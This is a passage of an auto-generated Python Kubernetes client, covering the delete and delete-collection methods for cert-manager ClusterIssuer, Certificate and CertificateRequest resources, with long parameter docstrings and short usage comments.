:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_cluster_issuer_with_http_info(name, **kwargs) # noqa: E501
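
# Sketch of a cascading foreground delete (hypothetical resource name):
#
#   status = api.delete_cluster_issuer(
#       name="letsencrypt-prod",
#       propagation_policy="Foreground",  # delete dependents before the object
#   )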
def delete_cluster_issuer_with_http_info(self, name, **kwargs): # noqa: E501
"""delete_cluster_issuer # noqa: E501
delete a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_issuer_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. The value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used, defaulting to a per-object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Should the dependent objects be orphaned? If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
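
# Asynchronous sketch, following the thread pattern shown in the docstring
# above (hypothetical resource name):
#
#   thread = api.delete_cluster_issuer_with_http_info(
#       "letsencrypt-prod", async_req=True)
#   status_obj, code, headers = thread.get()  # blocks until the request finishes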
def delete_collection_cluster_issuer(self, **kwargs): # noqa: E501
"""delete_collection_cluster_issuer # noqa: E501
delete collection of ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_cluster_issuer(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_cluster_issuer_with_http_info(**kwargs) # noqa: E501
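
# Sketch: restrict the collection delete with a label selector instead of
# deleting every ClusterIssuer (hypothetical label):
#
#   api.delete_collection_cluster_issuer(
#       label_selector="env=staging",
#       timeout_seconds=30,  # bound the server-side list/delete call
#   )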
def delete_collection_cluster_issuer_with_http_info(self, **kwargs): # noqa: E501
"""delete_collection_cluster_issuer # noqa: E501
delete collection of ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_cluster_issuer_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_certificate(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate # noqa: E501
delete collection of Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_certificate_with_http_info(namespace, **kwargs) # noqa: E501
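
# Sketch: target a single Certificate by field selector within one namespace
# (hypothetical object name; assumes the server supports metadata.name field
# selectors for this resource):
#
#   api.delete_collection_namespaced_certificate(
#       namespace="default",
#       field_selector="metadata.name=old-cert",
#   )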
def delete_collection_namespaced_certificate_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate # noqa: E501
delete collection of Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_certificate_request(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate_request # noqa: E501
delete collection of CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_request(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_certificate_request_with_http_info(namespace, **kwargs) # noqa: E501
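
# Sketch: dry-run the collection delete first, so nothing is persisted:
#
#   api.delete_collection_namespaced_certificate_request(
#       namespace="default",
#       dry_run="All",  # all dry-run stages are processed, no modifications
#   )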
def delete_collection_namespaced_certificate_request_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate_request # noqa: E501
delete collection of CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_request_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
